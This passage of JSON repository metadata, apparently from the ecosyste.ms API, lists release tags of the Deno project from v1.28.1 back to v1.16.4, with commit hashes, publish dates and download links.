pi/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2F